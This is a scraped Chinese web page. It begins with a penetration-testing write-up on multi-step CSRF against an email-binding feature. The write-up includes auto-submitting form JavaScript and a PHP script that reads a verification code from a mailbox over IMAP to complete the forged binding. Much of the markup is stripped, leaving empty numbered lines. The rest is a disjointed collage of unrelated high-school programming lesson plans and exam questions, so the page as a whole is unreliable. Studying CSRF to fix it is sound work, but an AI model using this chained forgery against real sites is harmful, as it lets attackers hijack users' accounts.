多步CSRF漏洞场景及其利用
CSRF的漏洞原理和利用方式这里就不多赘述了。平时大家讨论的CSRF利用多是发送一次请求。比如CSRF刷粉丝,CSRF发微博。这里主要讨论一个稍微复杂点的利用场景。
最近在做测试的时候遇到一个案例,用户绑定邮箱的请求没有防御CSRF。但是大家都知道绑定邮箱这个操作不是一步完成了。这次遇到的这个案例是这样的。用户发送一个申请绑定邮箱的请求,服务器给该邮箱发送一个验证码,然后用户在页面中输入验证码完成绑定。
从上图的路程中可以看出。按照常见的csrf的漏洞来说,这里是没法利用的。因为即使我们伪造了请求,让用户发出了绑定申请的邮件,还需要用户把这个验证码在页面上输入才行。经过更进一步的分析发现,图中4这一步也是没有防御CSRF的。也就是说我们可以伪造两次请求来实现CSRF绑定邮箱。这样一个场景就是比较典型的多步CSRF。
有了思路就可以开始写demo了。最初的想法:是不是用两个表单就可以了呢。
1.
2.
3.
11.
15.
16.
测试发现这想法太天真了。第一个表单提交之后,就会跳转到返回的结果页面了。第二个表单不会提交了。而且这里遇到的这个场景比较特殊,并不是仅仅是先后提交两个表单就可以了。第二个表单里的值(验证码)是需要第一个表单提交之后,从邮箱里读出来再放到第二个表单里。经过查找资料。找到几个解决方案。
解决方案1:
使用form的target属性。target 属性规定在何处打开 action URL。
根据查到的资料。默认是_self。所以会跳到结果页。我们使用_blank试试。
1.
2.
3.
7.
11.
16.
这种方式可以实现两次post的需求,不过太过暴力。需要新弹出窗口不说。弹出窗口也很可能被浏览器拦截掉。
解决方案2:
target可以选择一个frame。framename 在指定的框架中打开。所以可以这样写。这样子可以比较优雅的发两个post请求。
1.
2.
3.
7.
11.window.onload = function() {
12. document.getElementById("form1").submit();
13. // to make 2nd form wait for 1st, put the following in a function and use as a callback for a new timer
14. document.getElementById("form2").submit();
15. }
16.
17.
18.
19.
解决方案3:
使用iframe自然也是可以的。类似
1.
3.
##具体到邮箱验证这个场景我使用了如下的一个poc。因为需要到邮箱中获取验证码。所以使用了两个文件。
文件1:发送申请邮箱绑定的请求:
1.
2.
3.
4.
5.
8.
11.
12.
13.
文件2:iframe的文件需要去邮箱获取验证码拼到表单里。
1.
2.$mail = 'mail@https://www.doczj.com/doc/172637947.html,';
3.$mailPass = 'pass';
4.sleep(2);//等待邮件发送
5.//以腾讯企业邮箱做了测试
6.$mailServer="https://www.doczj.com/doc/172637947.html,"; //IMAP主机
7.$mailLink="{{$mailServer}:993/ssl}INBOX" ;
8.$mailUser = $mail; //邮箱用户名
9.$mbox = imap_open($mailLink,$mailUser,$mailPass) or die("can't connect: " . imap_last_error()); //开启信箱
imap_open
10.$totalrows = imap_num_msg($mbox);
11.// echo $totalrows;//取得信件数
12.$numcode = '';
13.$mailBody = imap_fetchbody($mbox, $totalrows, 1); //获取最新的一封邮件
14.$mailBody = base64_decode($mailBody);
15.preg_match('/\d{6}/',$mailBody,$res);//匹配验证码
16.$numcode = $res[0];
17.echo $numcode;
18.$form2 = '
19.
20.
24.
26.
27.';
28.echo $form2;
如有雷同纯属巧合。参考资料:
https://www.doczj.com/doc/172637947.html,/2014/05/multi-stagedmulti-form-csrf.html https://www.doczj.com/doc/172637947.html,/2012/09/29/two-stage-csrf-attacks/
★教师寄语:春天是碧绿的天地,秋天是黄金的世界。愿你用青春的绿色去酿造未来富有的金秋!。★ 第一节用计算机程序解决问题 学习目标: 1.初步掌握用计算机程序解决问题的基本方法 2.认识计算机程序的工作过程与基本特征 3.了解用计算机程序解决问题的过程 学习重难点: 计算机程序设计的基本流程。 学习内容: 一、读故事,找答案。答案是经过加密处理的,怎么把它解密呢? 二、加密程序的制作过程: 1、分析问题 加密的方法是将答案中的字符进行某种变换,使得别人不能读懂,使用时再进行逆变换,因为每个字符在计算机内都有相应的代码存储表示,即机内码,因此,可以对邮件字符的机内码值进行某种变换,原来的字符就会变成其他的字符,只要猜谜者未发现这个变换,他就无法读懂这段变换了的文字,从而达到加密的目的。 2、设计算法 算法:解决问题的详细方法与步骤,是编写程序的基础。 打开文本文件,从中逐个读出字符,并把其机内码值值减去10所得代码对应的字符作为加密文字符,并将他们逐个串起来成为密文文件保存 3、编写程序 有了清晰可操作的算法描述,就可以选择一种计算机语言工具来编写程序。 阅读课本74——75页,找出下列问题:
◆1、计算机中的集成电路是采用()数字编码表示和控制的。 ◆2、举出几种高级语言系统。 程序——让计算机实现某一功能的一系列计算机能够识别的语句。 只要算法确定,语言的选择没有特别的限定,通常根据问题的特性和编程人员对语言的熟悉程度来选定。 4、调试运行 程序设计好以后,通过键盘输入计算机中运行,看程序能否按预想的执行。计算机只懂得程序设计语言中所规定的语法规则,如果编写程序时与规则不一致,哪怕是一个标点符号出错,也会令程序出错而中断运行,此时,可以根据计算机提示的出错信息修改程序,重新调试运行。 5、检测结果 当程序能够顺利运行以后,还需要对程序功能进行分析和检查。因为如果程序语句符合语法规则,而程序中有逻辑错误或计算方法等错误,计算机是检查不出来的。因此,如果结果不合理,还要回头对程序进行修改。 三、小结:计算机程序设计的基本流程 四、小组探究:要把加密程序代码转换成解密程序代码,需做哪些修改? Private Sub Form_Load() FileName$ = InputBox("请输入需要加密的文件名及路径:") Open FileName$ For Input As #1 Line Input #1, a$ MsgBox a$, , "加密前的文本内容" Close #1 mm$ = "" n = Len(a$)
用计算机程序解决问题 一、教学目标: 1、知识与技能 (1)执行一段计算机程序,了解计算机程序的工作过程 (2)解剖程序实例,理解使用计算机程序解决问题的基本流程在完成学习任务的过程中,合理使用信息技术和方法实行简单的探究活动。 3、情感、态度与价值观 借助计算机程序解决问题的思想方法,养成严谨客观的学习习惯。 4、教学重点、难点: 本节内容的重点是:计算机程序解决问题的基本流程。 本节内容的难点是:计算机程序解决问题的方法。 5、课时安排:1课时 二、教学过程设计: 1、体验程序的运行过程及作用(活动) 执行“老鼠过街”游戏(分别请二个学生上台玩) 执行环境在VB中 过渡到画二次函数图像的程序。 2、剖析用计算机程序解决问题的过程 (1)分析问题 对于一个实际问题,首先需要分析该问题的需求情况及已知条件,来判断解决问题的可能性和目标要求,然后对需要解决的问题给出一
个精确的描述。 (2)设计算法 寻找解决问题的方法和步骤称为算法设计。 解决方法:利用描点法去画函数图像 算法设计: 1)给出画图框 2)给出程序执行按纽 3)定义坐标轴 4)定义纵坐标、横坐标 5)定义变量 6)给定颜色 7)描点法算法 8)结束算法 (3)编写程序 选择程序设计语言,通过程序设计语言实现算法,编写出程序(代码)。 (4)调试运行程序 1)打开程序设计语言软件Visual Basic(简称VB) 2)输入编写好的程序 3)运行程序,检验程序功能 4)调试修改错误 5)保存程序并生成“*.exe”编译文件
(5)检测结果 3、练习 (1)执行老师已给定的程序。 (2)修改老师给定的程序,画出已下函数的图像。Y=-x^2 Y=2^x Y=5*sin(x) (3)尝试自己编写加法程序。
用计算机程序解决问题 ——用程序设计思想挖掘学生创造性解决问题的潜力 (青岛二中胡芳案例设计、实施者 青岛市电教馆张捷案例指导者 青岛二中王群案例指导者) 【对应的课标知识点】用计算机程序解决问题的基本思想和方法;QuickBasic编程环境及其基本操作。 【知识点的相互衔接】与高中信息技术“算法与程序设计”模块衔接; 【本课教学法提点】“统一的课程标准,多样化的教学实施;固化的教材体系,创造性的教学过程”;分层次教学的任务设置 模块:高中信息技术基础 年级:高中一年级 所用教材版本:广东教育出版社 建议学时数:1学时,非上机时间15分钟,上机操作时间30分钟。 教学设计 教学目标 1.理解计算机程序的概念,初步掌握利用计算机程序解决问题的基本思想和方法。 2.熟悉QuickBasic编程环境及其基本操作。 3.亲历用计算机程序解决问题的完整过程,体验用其解决问题的方法。 4.激发学生学习编程、探索知识的兴趣,培养学生发现、解决问题的能力。
(二)内容分析 1.教学重点 通过体验程序的运行过程及作用,了解用计算机程序解决问题的基本思想,掌握用计算机程序解决问题的方法。 2.教学难点 理解计算机程序的概念;应用掌握的方法创造性地解决生活中的问题。 3.教学内容在整个知识体系中的位置 本节课学习的内容是用计算机程序解决问题,属于信息加工与表达这一教学主题。课程标准对这部分内容的要求是了解计算机进行信息处理的基本过程,初步认识计算机与人类处理信息的异同,具体实施可通过使用一种高级语言编程工具解决一些简单问题来实现。 教材将这部分内容编写在第四章《信息的加工与表达》(下)中的第一节(教材的学习内容是通过体验程序的运行过程和作用、查看程序的代码,对计算机程序有一个感性的认识,理解计算机程序的概念,再通过一个简单程序的设计,剖析用计算机程序解决问题的过程。教材给出的实例是加密解密程序,使用的编程环境是VB。)。依照课程标准的指导思想和要求,根据我校学生的具体情况,我们选择了简单易学的QuickBasic编程环境,并通过学生感兴趣的多个实例来实施教学,取得了良好的教学效果。 (三)学生分析 我们的学生来自不同的初中学校,他们的信息技术背景不同,信息素养和动手操作能力也不同。绝大部分学生没有学过编程知识,因而这部分内容对他们来说是全新的;有的学生参加过兴趣班的学习,具备一定的编程能力;有的学生对于程序设计只是略有耳闻。面对层次分明的学生,只有实施分层次教学,设置不同难度的任务,才能让他们在课堂
教师学科教案[ 20 – 20 学年度第__学期] 任教学科:_____________ 任教年级:_____________ 任教老师:_____________ xx市实验学校
4.1 用计算机程序解决问题 本节的课程标准内容: (二)信息加工与表达(3)初步掌握用计算机进行信息处理的几种基本方法,认识其工作过程与基本特征。 本节课程标准分析: 1.通过具体实例,了解算法含义,理解算法是程序设计的核心。 2.了解计算机解决问题的基本过程,让学生体验用算法与程序设计解决问题的思想方法,即从遇到的问题出发,分析问题,发现问题的本质,选择、设计相应的算法,通过程序设计语言的使用来编制程序,最终实现问题的解决。 【教材分析】 本节位于《信息技术基础》(广东版)的第四章《信息的加工与表达》第一节,教材通过演示并解剖一段给文本文件加密和解密的计算机程序,来帮助学生了解利用高级语言解决实际问题的基本工作过程,然后以这段加密和解密的计算机程序为例,讲解用计算机程序解决问题的基本过程。使学生对计算机程序的结构和作用有初步的认识,为学生学习选修模块打下基础。但对学生来说,在短时间内编写加密解密的程序很困难,学生很难在一节课中完整地体验“用计算机程序解决问题”这一过程。 【学情分析】 编程对于高一学生来说,是高深而神秘的。即使学生在初中甚至小学已经接受过系统的信息技术学习,但对于利用计算机来进行编程方面,绝大多数学生还是不熟悉。部分地区的初中教材中有涉及VB,但一般放在9年级,学生面临中考,一般没有很好的学习。因此,老师就要选择最容易上手的编程工具,避开复杂的代码,引导这些零起点的学生编写最简单的程序,使其亲历如何利用编程来解决现实中的问题这一过程。 【任务分析】 算法教学和数学是密切联系的。《课标》指出:算法教学要强调理论与实践的结合,引导学生注意寻找、发现身边的实际问题,进而设计出算法和计算机程序去解决这些问题。所以教师选择的实例最好来源于生活,让学生深刻体会计算机是现代信息处理的基本工具。为此,我选择编写程序来分析“读心术”游戏为实例,该实例贴近生活,趣味性强,对学生具有一定的吸引力。 【教学目标】 1.知识与技能 掌握scratch的基本操作,能使用scratch来编写简单的程序; 初步了解什么是算法和常见的编程语言。
4.1计算机解决问题的过程 一、教材分析 本节课的教学内容是广东教育出社版、高中课程标准实验教材必修《信息技术基础》第四章4.1《用计算机程序解决问题》第一课时的内容。 二、学生分析 本节内容涉及的是面向对象的高级编程语言,对于完全没有接触过编程的高一学生来说有一定难度。同时学生因为在初中没有接触过程序设计,普遍对程序的本质认识模糊,因此,本节课目标要求学生对程序有个大致的认识、并通过计算商场打折问题体验程序运行的过程,激发他们学习编程知识的兴趣。 三、设计思想 针对以上教学目标和教学重难点,在教学中我首先以解决问题的形式引入,如果自己要加密一个文件都有哪些方法?自然的引入加密与解密程序让学生亲自操作体验,分析程序代码,了解程序段执行的功能;然后要求学生通过看书了解计算机的构成及工作原理,熟悉计算机程序设计语言的发展,提出新问题—打折问题,如何利用程序来处理?引入程序设计语言,介绍VB,明确了用数学方法如何解决后,让学生在VB中复制课前准备好的代码解决问题,激发学生兴趣,实现“能在高级语言编程环境操作执行一段简单的计算机程序代码”的教学目标。 四、教学目标 1.知识与技能: 了解计算机的构成及工作原理。能在高级语言编程环境操作执行一段简单的计算机程序代码。 2.过程与方法: 初步认识计算机程序代码的执行目的。初步了解VB语言的工作环境。 3.情感态度与价值观: 在新旧知识的过渡中,产生对新知识的渴望。 五、教学重难点 重点: (1)了解计算机的构成及工作原理,大体了解程序段执行的功能是什么。 (2)初步体验vb语言编译环境,并尝试在其中操作执行一段实用的计算机程序代。 难点:了解计算机程序代码的作用,培养学生对计算机程序的兴趣。
山西省普通高中信息技术学业水平考试题集1 第一章如何用计算机解决问题 一、考点分析: 1、人类解决问题:首先观察、分析问题、收集必要的信息,然后根据已有的知识、经验进行判断、推理, 尝试按一定的方法和步骤去解决问题。 2、计算机解决问题:分析问题——设计算法——编写程序——运行程序。 3、计算机程序定义:就是指示计算机如何去解决问题或完成任务的一组可执行的指令。 4、算法就是解决问题的方法和步骤。 5、算法是程序设计的“灵魂“; 6、算法+数据结构=程序 7、算法的特征:有穷性(执行有限步以后结束,且每一步的执行时间也是有限的;) 确定性(每一步都有确切的含义) 输入性(有零个或多个输入) 输出性(至少产生一个输出) 可行性 8、算法的描述:自然语言、流程图、伪代码; 9、流程图也称为程序框图,起止框(圆角矩形)、输入输出(平行四边形)、判断(菱形)、处理(矩形); 10、程序设计语言的发展经历了机器语言、汇编语言、高级语言。 11、计算机可以直接识别的语言是机器语言,机器语言是一串由“0”和“1”构成的二进制代码。 12、比较流行的高级语言有BASIC、C、C++、FORTRAN、PASCAL、COBOL、JA V A等。 二、题型: 填空1、流程图中输入输出的图形是。 2、流程图中可以有等图形。 3、计算机能够直接识别的语言是。 4、对信息进行编程加工时,是编程的核心,是解决问题的方法和步骤; 单项5、下列关于算法的特征描述不正确的是()。 A、有穷性:算法必须在有限步之内结束 B、确定性:算法的每一步必须有确切的含义 C、输入:算法必须至少有一个输入 D、输出:算法必须至少有一个输出 6、程序是() A解决某个问题的文档资料B计算机的基本操作 C解决某个问题的计算机语言的有限命令的有序集合D计算机语言 7、刘丽想帮她妈妈设计一个文件加密程序,制定了如下的工作过程,你认为最恰当的是() A、分析问题、编写程序代码、运行程序、得到答案 B、分析问题、设计算法、编写程序代码、调试运行 C、设计算法、编写程序代码、调试程序、得到答案 D、分析问题、设计程序、编写程序代码、运行程序 8、下列属于计算机程序设计语言的是( ) A、ACDSee B、VisualBasic C、Wave Edit D、WinZip 9、下列不是用于程序设计的是( ) A、BASIC B、C语言C、WORD D、Pascal 10、人们根据特定的需要,预先为计算机编制的指令序列称为()。 A、软件 B、程序 C、语句 D、文件 11、用流程图来描述分支结构时要使用()符号。 A、连接圈 B、处理框 C、输入输出框 D、判别框 12、人们利用计算机解决问题的基本过程一般有如下五个步骤(①~⑤),请按各步骤的先后顺序在下列选项(A~D)中选择正确的答案()①调试程序②分析问题③设计算法④构建数学模型⑤编写程序 A、①②③④⑤ B、②④③⑤① C、④②③⑤① D、②③④①⑤
【课题】:第四章信息的加工与表达(下) 4.1 用计算机程序解决问题 【授课教师】:合肥十七中查光亮 【课程标准】:初步掌握用计算机进行信息处理的几种基本方法,认识其工作过程与基本特征。【教材分析】:用计算机程序解决问题是当今社会中信息处理的重要方法之一,学生要了解计算机程序的工作过程,初步掌握用计算机程序解决问题的基本过程,在用计算机程序解决问题时,算法设计是一个很关键的环节。而算法的核心是一种思维方式,算法思维习惯有利于增强思维的条理性。 本节是对用计算机程序解决问题的基本过程的入门介绍,是选修模块《算法与程序设计》的概述和引子。因此,能否通过本节内容的学习来激发学生对计算机程序设计的兴趣,将直接关系到选修模块《算法与程序设计》的顺利开设。 【学情分析】: 通过前面章节的学习,学生已具备一定的计算机使用经验,如文字处理、媒体表达、数据表格处理、浏览器、声音媒体播放软件等。但对于程序设计普遍陌生,对自己编程来解决问题,既感觉新奇有趣,又有一定的技术难度。同时高一学生已具备一定的逻辑推理能力和相关的数学知识,对用计算机程序解决问题的初步了解不会觉得十分困难。虽然学生不可能用一两节课的时间就对编程掌握很多,但让他们在体验中理解信息的编程加工,并通过简单的改进实现小小的目标,有成功的体验是完全能够达到的。 【教学目标】: 1.知识与技能目标 ①认识计算机和程序,了解计算机的构成,知道程序的重要性。 ②通过体验几个简单的计算机程序实例,引发学生对计算机程序的强烈兴趣。 ③通过用VB编写、调试简单程序,并检测运行结果,体验程序编写的乐趣。 2.过程与方法目标 ①知道程序是解决现实世界某类相关问题的有效方法之一,逐步形成程序设计的意识和能力。 ②培养学生用程序设计思想慎密思考问题的意识和能力 3.情感态度与价值观目标 ①揭开程序设计的神秘感和畏难心理,培养学生进一步学习程序设计的兴趣 ②感悟计算机程序设计的思想,增加学生的学习成就感和形成严谨客观的解决问题作风。
班级姓名座号 一、选择题 1、人们利用计算机解决问题的基本过程一般有如下五个步骤(①~⑤),请按各 步骤的先后顺序在下列选项(A~D)中选择正确的答案() ①调试运行程序②分析问题③设计算法④问题解决⑤编写程序 A、①②③④⑤ B、②④③⑤① C、④②③⑤① D、②③⑤①④ 2、在下图中利用计算机解决问题的基本步骤流程图中,对于标注为(1)的流程 线,以下说明正确的是() A.该流程线可有可无B.当程序运行不出结果时,才需要该部分流程线C.该部分流程线保证了问题解决的正确性D.该部分流程线有错 3、下列三种算法的描述,缺乏直观性、简洁性,最容易产生歧义的是( ) A、自然语言描述法 B、流程图 C、伪代码 4、流程图中表示判断的是() A、矩形框 B、菱形框 C、圆形框 D、椭圆形框 5、“分支判断”作为解决问题的算法的一个基本步骤,正是体现了计算机的( )能力。 A、算术运算能力 B、逻辑运算能力 C、分布式运算能力 D、记忆存储能力 6、下面关于算法的描述,正确的是() A、算法不可以用自然语言描述 B、算法只能用框图来描述 C、一个算法必须保证它的执行步骤是有限的 D、算法的框图表示法有0个或多个输入,但只能有一个输出 7、下面关于算法的描述,正确的是() A、一个问题只有一个算法 B、一个问题可能有多种算法 C、能解决问题的算法都是好算法,没优劣之分 D、算法不是程序设计所必需的 8、下列关于算法的叙述,正确的是() A、解决一个问题的算法只有一种 B、有穷性是算法的基本特征之一 C、可行性不属于算法基本特征 D、算法对程序设计没有任何作用 9、下列关于算法的叙述,正确的是() A、解决一个问题的算法只有一种 B、算法必定有一个或一个以上的输出 C、算法中可以存在不确切的步骤 D、描述算法的步骤可以是无穷的 10、从以下计算S的算法可以看出,S的代数式表示是() ①变量S的初值是0;②变量I从1起循环到N; ③循环表达式为S=S+(-1)*i;④输出变量S的值 A.1-2+3-4+…+(-1)N*(N-1) B.1-2+3-4+…+(-1)N-1*n C.1+2+3+4+…+(n-1)+n D.-1-2-3-4-…-(n-1)-n
《用计算机程序解决问题》教学反思——用游戏吸引学生 “用计算机程序解决问题”是必修课程中的第四章,相对选修课程《算法与程序设计初步》内容是比较简单,但教学目标个人认为不易达到。 在学生印象中,“算法”与“程序”是比较枯燥、复杂的。特别是个别女生,更是望而却步。回忆起以前讲算法时,曾有学生非常之费解“i=i+1”,更有学生在上课时干脆不听讲,做其他科目的作业来…… 本章教学有一优势就是时间上——刚好是数学科必修3“算法初步”学生刚好学习过,因此,信息技术老师在“算法”可以省下不少功夫。算法不用从头讲,三种基本逻辑结构学生也掌握了,我们要做的,就是让学生进一步理解“算法”的重要性,并初步体会到“程序”的“奇妙”,更好的做法——让学生用计算机程序解决数学问题。 鉴于此,教学方法上有了新想法,重新设计了教学过程。 反思一:用游戏去吸引学生,诱发思考,让算法与程序变得有趣。 在讲第一课时,在引入时我用了一个“猜数学游戏”和学生互动。 我:同学们,上课之前,我们先来做一个游戏,“猜数学游戏”。(学生们一下子来了精神,今天这个“大叔”要搞什么?)我心中有一个0-100之间的整数,你们谁来猜猜,看谁能用最少次数猜出来!每猜一次,我会提示你猜的数字是“大了”或者是“小了”,一直到你猜中为止。 学生踊跃起来,选了一个学生,猜了差不多10次,猜不中。这时,学生中有人有意见了:“老师,你作弊吧,猜中了也说不对!” 我说:“老师怎么会骗你们,在你们开始猜的时候,我就已经把数字写在纸上了。”我果然把写在纸上的数字给学生看,当然,我选择的数字为了防止学生一猜就中,还是选择一个比较“随机”的数字。 我再说:“要不这样,你选一个数字我来猜,只要是0到100之间的整数,我保证能在7次之内猜出来!” 学生一听,马上“应战”。我在黑板上写出每次猜的数字……我在7次内猜到了学生的数。学生的眼神中,有佩服、有怀疑、有若有所思。 这时,我揭开谜底: 在黑板上画了一条数轴,标上0和100 ,第1次猜50(中间数),若大了,第2次就猜25,若小了,第2次就猜75……这样就能在7次内猜出这个数字。 学生恍然大悟,我进一步拓展:这种解题思想其实也就是数学中的“二分法”思想,取中间值。 这时,我引出新的问题:那么,我们能不能用计算机程序来实现这个游戏呢? 学生们的兴趣被调动起来,并引发思考。 我把程序设计思路讲给学生听,接着问:编写程序之前,我们必须先写出什么? 学生齐答:算法! 我马上抛出本课任务:好,那么大家利用PPT来写出这个算法的流程图。 小结:用游戏教学法是成功的,但在写算法时,还是有相当部份学生不能够正确地画出流程图,究其原因,学生在思路上不成熟,导致在条件结构与循环结构嵌套上条理不清。所以在上后面两个班时,我先学生们一起先用“文字”描述算法,再让学生用“流程图”写出算法,效果好了很多。
4.1 用计算机程序解决问题 本节的课程标准内容: (二)信息加工与表达(3)初步掌握用计算机进行信息处理的几种基本方法,认识其工作过程与基本特征。 本节课程标准分析: 1.通过具体实例,了解算法含义,理解算法是程序设计的核心。 2.了解计算机解决问题的基本过程,让学生体验用算法与程序设计解决问题的思想方法,即从遇到的问题出发,分析问题,发现问题的本质,选择、设计相应的算法,通过程序设计语言的使用来编制程序,最终实现问题的解决。 【教材分析】 本节位于《信息技术基础》(广东版)的第四章《信息的加工与表达》第一节,教材通过演示并解剖一段给文本文件加密和解密的计算机程序,来帮助学生了解利用高级语言解决实际问题的基本工作过程,然后以这段加密和解密的计算机程序为例,讲解用计算机程序解决问题的基本过程。使学生对计算机程序的结构和作用有初步的认识,为学生学习选修模块打下基础。但对学生来说,在短时间内编写加密解密的程序很困难,学生很难在一节课中完整地体验“用计算机程序解决问题”这一过程。 【学情分析】 编程对于高一学生来说,是高深而神秘的。即使学生在初中甚至小学已经接受过系统的信息技术学习,但对于利用计算机来进行编程方面,绝大多数学生还是不熟悉。部分地区的初中教材中有涉及VB,但一般放在9年级,学生面临中考,一般没有很好的学习。因此,老师就要选择最容易上手的编程工具,避开复杂的代码,引导这些零起点的学生编写最简单的程序,使其亲历如何利用编程来解决现实中的问题这一过程。 【任务分析】 算法教学和数学是密切联系的。《课标》指出:算法教学要强调理论与实践的结合,引导学生注意寻找、发现身边的实际问题,进而设计出算法和计算机程序去解决这些问题。所以教师选择的实例最好来源于生活,让学生深刻体会计算机是现代信息处理的基本工具。为此,我选择编写程序来分析“读心术”游戏为实例,该实例贴近生活,趣味性强,对学生具有一定的吸引力。 【教学目标】 1.知识与技能 掌握scratch的基本操作,能使用scratch来编写简单的程序; 初步了解什么是算法和常见的编程语言。
《用计算机解决生活中实际问题的方法》教学设计 湖北省黄石二中李志 适用范围:高二年级下期《算法与程序设计》(选修模块) 课时:1课时 一、教学目标 1.课程标准中的相关内容 课程标准在《算法与程序设计》模块中有如下阐述:“教师应引导学生寻找、发现身边的实际问题,并设计出算法和计算机程序去解决生活中的实际问题”。 2.知识与技能 (1)能将日常生活中复杂的问题简化、抽象,构建合理的数学模型。 (2)将数学模型转化成Pascal的算法流程,并最终写成Pascal程序。 (3)能较熟练的调试程序,并验证结果的正确性。 3.过程与方法 ⑴教师点拨,学生相互讨论,自主探究。
⑵学生通过探究建立数学模型,并将模型转化成算法。 ⑶上机调试,并验证结果。 4.情感态度与价值观 ⑴引导学生关注现实生活,发现实际问题,激发学生学习的热情。 ⑵通过教师引导,学生相互讨论,自主探究,培养协作意识、创新思维与进取精神。 ⑶培养学生对问题的分析能力、建立数学模型的能力,并用计算机去解决问题的能力。 二、学情分析 本节内容的教学对象是高二年级学生,他们已经具备了一定的逻辑思维、分析问题、表达思想等能力。同时,通过前面对算法描述方法(自然语言、流程图)和Pascal语言的学习与介绍,学生已初步掌握了程序的三种基本结构等基础知识,为本节内容的学习提供了良好的基础。 三、教材分析 1.本节主要内容介绍 本节内容是我校校本教材《Pascal 程序设计》中《算法与问题解决》第一节,通过实际生活中的简单的例子,帮助学生了解用计算机解决实际问题的一般步骤和方法,并具体设计出算法和计算机程序。
2.重点难点分析 教学重点: ⑴实际问题的简化与抽象,并建立合理的数学模型; ⑵算法过程的描述以及算法与程序的转换过程; ⑶Pascal程序的调试及结果的验证。 教学难点: ⑴实际问题的简化与抽象; ⑵算法与程序的转换过程。 3.课时安排 1课时。 四、教学理念 本节内容的教学设计充分体现了《普通高中信息技术课程标准》中的基本理念,注重教学过程中三维目标的渗透。采用了以学生的学习和发展为中心,基于建构主义理论的任务驱动、情境教学等教学方法,
第四章第一节《用计算机程序解决问题》说课稿 (2课时)凤台一中:张亚君 各位评委,各位老师,大家好! 我说课的题目是:《用计算机程序解决问题》。主要分为四个方面来说课,分别是说教材、说学情、说教法、说教学准备、说教学过程。 (一)说教材 1、本节的作用和地位: 用计算机程序解决问题,是信息加工和处理的一种重要手段,是人们把现实世界的任务转换成计算机可以直接识别并执行的指令代码。通过学习本节内容,让学生了解到计算机是在人们的具体指令之下解决实际问题的,计算机程序是一组操作指令或语句序列。以往使用过的工具软件事实上也是一种计算机程序,只不过那是别人已经编写好的,可以在计算机上直接使用的工具软件而已。 通过操作和剖析已经编好的计算机程序,在解决实际问题中分析并了解其工作过程,这种通过问题分析并形成算法再利用计算机程序解决问题的思路和做法,对学生解决问题的时候有很大的帮助。 2、本节主要内容介绍 本节课的内容结构是:执行一段计算机程序,建立对计算机程序解决问题的工作过程的初步认识;然后解剖程序实例;了解计算机程序设计的基本过程。 第一部分内容主要是通过操作一段实用计算机程序加密和解密,了解运行程序解决问题的基本过程。 第二部分内容了解计算机程序设计的基本过程的有关知识,计算机程序设计的基本过程:分析问题、设计算法、编写程序、调试运行、检测结果、修改完善。 3、教学目标 ⑴初步掌握用程序解决问题的过程。 ⑵能在高级语言编程环境操作执行一段简单的计算机程序代码。 ⑶初步认识计算机程序代码的执行目的。 ⑷认识计算机程序设计的基本流程 ⑸培养学生进一步学习程序设计的兴趣。 4、重点难点分析: 教学重点:帮助学生掌握用计算机程序解决问题的过程。 教学难点:明白计算机程序代码的作用。 (二)学生分析 我校高一年级学生在进校后我们作过简单调查,在信息技术学科中有30%左右的学生是“零起点”,还有70%的学生虽非“零起点”,但对以前学过的知识掌握的较差。因此,在教学设计中第一课时对Visual Basic首先作以介绍。(三)说教法 1.教学方法设计
第一节用计算机程序解决问题 课程内容标准 初步掌握用计算机进行信息处理的几种基本方法,认识其工作过程与基本特征。 一、教材分析 本节内容主要讲述用计算机进行信息处理的其中一种基本方法,即用计算机程序解决问题,能够通过解剖一段计算机程序实例,认识其工作过程,从而对利用高级语言编程工具解决问题的基本方法有所了解。 1、本节的作用和地位 用计算机程序解决问题,应该是当今社会的一种根本手段,是人们把现实世界的任务转换成计算机可以直接识别并执行的指令代码。通过学习本节内容,让学生了解到计算机是在人们的具体指令之下解决实际问题的,计算机执行的每一个动作,都是程序员预先设计的。计算机程序,就是利用程序设计语言编写成计算机可以识别和执行的程序指令,人们使用这些编写好的现成的程序软件来解决一些实际问题。通过本节内容的学习,学生还可以了解到以往使用过的工具软件事实上也是一种计算机程序,只不过那是别人已经编写好的、可以在计算机上直接使用的工具软件而已。 学生通过操作使用已经编写好的计算机程序,在解决实际问题(例如对文本文件进行加密和解密)中分析并了解其工作过程。学生还对编写计算机程序的基本过程有所了解,并对计算机程序的具体作用有初步认识,这种通过问题分析并形成算法再利用计算机程序解决问题的思路和做法,对培养学生有条理、按步骤解决问题的习惯有很大帮助。 2、本节主要内容介绍 在日常生活中,人们除了使用计算机的工具软件处理许多事情之外,相当部分的现实问题也都可以利用计算机程序的方式加以解决,实现一些个性化的信息处理方式。同时这种针对某些具体问题的计算机程序解决办法,也可以经过技术处理把这些具有某种功能的计算机程序,改造成为具有某种通用功能的工具软件,即我们所经常使用的通用工具软件,例如文字处理、图表处理、多媒体加工等工具软件。所以利用计算机程序解决问题既是一项独特的个人化工作,也是一个人类社会的标准化工作。 本节的内容结构是:执行一段计算机程序,了解计算机程序的工作过程;然后解剖程序实例,探讨计算机程序设计的基本过程。 第一部分内容主要是通过操作一段实用计算机程序,了解其工作的基本过程。先让学生在高级语言(Visual Basic)环境下操作一段“加密”程序,观察其执行过程和运行结果;然后再让学生操作一段相应的“解密”程序,比较并分析程序
4.1编程计算机程序解决问题 知识点:硬件基础知识 冯·诺依曼计算机 冯·诺依曼计算机主要由运算器、控制器、存储器和输入输出设备组成,它的特点是:程序以二进制代码的形式存放在存储器中;所有的指令都是由操作码和地址码组成;指令在其存储过程中按照执行的顺序;运算器和控制器作为计算机结构的中心。 中央处理器 运算器和控制器合称中央处理器CPU,根据程序指令控制各部件相互配合工作,是计算机的运算核心和控制核心。 存储器(存储器有内存和外存之分) 内存速度快,只用于存放计算机正在处理的程序和数据,一旦断电,存储的信息有可能丢失(内存分成两个部分ROM断电也能够保留数据和RAM断电时其中的数据就会丢失); 外存储速度慢,但存入的信息不会因断电而丢失,可长时间保存。 计算机内的容量换算:1GB=1024MB、 1MB=1024KB 、 1KB=1024B、 1B(字节)=8b(位) 输入设备扫描仪、键盘、鼠标、麦克风、手写板等 输出设备打印机、显示器、音箱、投影仪 1.整个计算机系统由___硬件___系统和___软件____系统两大部分组成。 2.冯?诺依曼原理关于计算机的组成提出计算机由输入设备、运算器、控制器、存储器和输出 设备五大部分组成,其中运算器和控制器合称_____中央处理器_____,英文缩写___CPU __。 3.由冯.诺依曼确定的计算机体系结构使电子计算机的发明有了可能,经过了几十年发展,这 种体系结构仍未有重大变化和突破,以下各项不是其基本思想是( D )。 A.使用二进制 B.程序存储与控制 C.硬件结构由五部分组成 D.三种程序控制结构 4.在计算机内部用来传送、存储、加工处理的数据或指令都是以___二____进制形式进行的。 5.外部设备包括( A ) A.输入、输出设备和外存储器B.输入、输出设备和内存储器 